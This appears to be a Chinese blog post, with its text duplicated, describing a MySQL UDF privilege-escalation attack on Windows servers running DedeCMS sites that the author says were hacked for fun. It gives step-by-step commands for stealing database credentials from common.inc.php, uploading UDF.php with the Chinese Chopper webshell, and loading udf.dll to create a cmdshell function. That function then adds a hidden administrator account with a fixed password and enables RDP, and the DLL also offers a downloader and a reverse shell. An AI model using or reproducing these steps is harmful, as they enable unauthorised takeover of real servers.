【提权】udf提权入侵
2015-05-09 20:03
169 查看
今天闲的无聊DEDECMS搞了几个站。没事做提权吧。真的很久很久没有玩这东西了。
测试经典的UDF.dll提权一次性成功。
dedecms的账号和密码都保存在data/common.inc.php里面;下载common.inc.php查看账号密码你懂的。
首先用菜刀上传UDF.php;然后输入账号密码啥的也就连接成功了。
作者:
二、适用场合:1.目标系统是Windows(Win2000,XP,Win2003);2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。
三、使用帮助:
第一步:将PHP文件上传到目标机上,填入你的MYSQL账号经行连接。
第二步:连接成功后,导出DLL文件,导出时请勿必注意导出路径(一般情况下对任何目录可写,无需考虑权限问题),对于MYSQL5.0以上版本,你必须将DLL导出到目标机器的系统目录(win 或 system32),否则在下一步操作中你会看到"No paths allowed for shared library"错误。
第三步:使用SQL语句创建功能函数。语法:Create Function 函数名(函数名只能为下面列表中的其中之一) returns string soname '导出的DLL路径';对于MYSQL5.0以上版本,语句中的DLL不允许带全路径,如果你在第二步中已将DLL导出到系统目录,那么你就可以省略路径而使命令正常执行,否则你将会看到"Can't open shared library"错误,这时你必须将DLL重新导出到系统目录。
如果执行:
create function cmdshell returns string soname 'udf.dll'
出现:
数据库查讯出错,请检查SQL语句create function cmdshell returns string soname 'udf.dll'的语法是否正确。Function 'cmdshell' already exists
解释:
在有些版本的MYSQL上确实会发生这事.这是一个MYSQL的BUG,官方描述如下:
http://bugs.mysql.com/bug.php?id=15439
Description:
Under some circumstances, case handling of UDF names leads to strange behaviour.
This can result in a situation where the function can be successfully dropped
without actually removing the corresponding entry from the mysql.func table.
…………
--------------------------------
解决这个问题你可以输入手工输入
delete from mysql.func where name='cmdshell'
第四步:正确创建功能函数后,你就可以用SQL语句来使用这些功能了。语法:select 创建的函数名('参数列表'); 每个函数有不同的参数,你可以使用select 创建的函数名('help');来获得指定函数的参数列表信息。
四、功能函数说明:
cmdshell 执行cmd;
downloader 下载者,到网上下载指定文件并保存到指定目录;
open3389 通用开3389终端服务,可指定端口(不改端口无需重启);
backshell 反弹Shell;
ProcessView 枚举系统进程;
KillProcess 终止指定进程;
regread 读注册表;
regwrite 写注册表;
shut 关机,注销,重启;
about 说明与帮助函数;
也可一次执行一下语句:
create function cmdshell returns string soname 'udf.dll'
select cmdshell('net user iis_user 123!@#abcABC /add');
select cmdshell('net localgroup administrators iis_user /add');
select cmdshell('regedit /s d:web3389.reg');
drop function cmdshell;
select cmdshell('netstat -an');
最后用 iis_user 123!@#abcABC登录就行了。
UDF下载地址:http://dl.dbank.com/c03histe6b
测试经典的UDF.dll提权一次性成功。
dedecms的账号和密码都保存在data/common.inc.php里面;下载common.inc.php查看账号密码你懂的。
首先用菜刀上传UDF.php;然后输入账号密码啥的也就连接成功了。
作者:
二、适用场合:1.目标系统是Windows(Win2000,XP,Win2003);2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。
三、使用帮助:
第一步:将PHP文件上传到目标机上,填入你的MYSQL账号经行连接。
第二步:连接成功后,导出DLL文件,导出时请勿必注意导出路径(一般情况下对任何目录可写,无需考虑权限问题),对于MYSQL5.0以上版本,你必须将DLL导出到目标机器的系统目录(win 或 system32),否则在下一步操作中你会看到"No paths allowed for shared library"错误。
第三步:使用SQL语句创建功能函数。语法:Create Function 函数名(函数名只能为下面列表中的其中之一) returns string soname '导出的DLL路径';对于MYSQL5.0以上版本,语句中的DLL不允许带全路径,如果你在第二步中已将DLL导出到系统目录,那么你就可以省略路径而使命令正常执行,否则你将会看到"Can't open shared library"错误,这时你必须将DLL重新导出到系统目录。
如果执行:
create function cmdshell returns string soname 'udf.dll'
出现:
数据库查讯出错,请检查SQL语句create function cmdshell returns string soname 'udf.dll'的语法是否正确。Function 'cmdshell' already exists
解释:
在有些版本的MYSQL上确实会发生这事.这是一个MYSQL的BUG,官方描述如下:
http://bugs.mysql.com/bug.php?id=15439
Description:
Under some circumstances, case handling of UDF names leads to strange behaviour.
This can result in a situation where the function can be successfully dropped
without actually removing the corresponding entry from the mysql.func table.
…………
--------------------------------
解决这个问题你可以输入手工输入
delete from mysql.func where name='cmdshell'
第四步:正确创建功能函数后,你就可以用SQL语句来使用这些功能了。语法:select 创建的函数名('参数列表'); 每个函数有不同的参数,你可以使用select 创建的函数名('help');来获得指定函数的参数列表信息。
四、功能函数说明:
cmdshell 执行cmd;
downloader 下载者,到网上下载指定文件并保存到指定目录;
open3389 通用开3389终端服务,可指定端口(不改端口无需重启);
backshell 反弹Shell;
ProcessView 枚举系统进程;
KillProcess 终止指定进程;
regread 读注册表;
regwrite 写注册表;
shut 关机,注销,重启;
about 说明与帮助函数;
也可一次执行一下语句:
create function cmdshell returns string soname 'udf.dll'
select cmdshell('net user iis_user 123!@#abcABC /add');
select cmdshell('net localgroup administrators iis_user /add');
select cmdshell('regedit /s d:web3389.reg');
drop function cmdshell;
select cmdshell('netstat -an');
最后用 iis_user 123!@#abcABC登录就行了。
UDF下载地址:http://dl.dbank.com/c03histe6b
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 从信息收集到入侵提权(渗透测试基础总结)
- 入侵提权过程中猜解linux路径与windows路径,网站路径暴力
- 【实战】一次艰难的入侵提权,成功拿下服务器
- MySQL扩展接口UDF提权
- MYSQL简单提权--Mix.dll My_udf.dll(老东西,做个备份)
- 入侵提权过程中猜解linux路径与windows路径,网站路径暴力
- 一次艰难的提权 MYSQL中的UDF 的研究
- udf提权的适用环境
- udf手动导出提权
- 入侵【提权】读取各种配置文件
- [提权禁区]1433端口入侵提权
- 轻松获取windows 明文登录密码(入侵提权后)
- 关于PHPMYADMIN的入侵提权拿服务器
- 高版本的udf提权
- 提权基础-----mysql-udf提权
- Mysql udf提权(Linux平台)
- 关于udf提权
- 入侵提权过程中猜解linux路径与windows路径,网站路径暴力
- udf提权方法和出现问题汇总
- SqlMap之mysql udf.dll 提权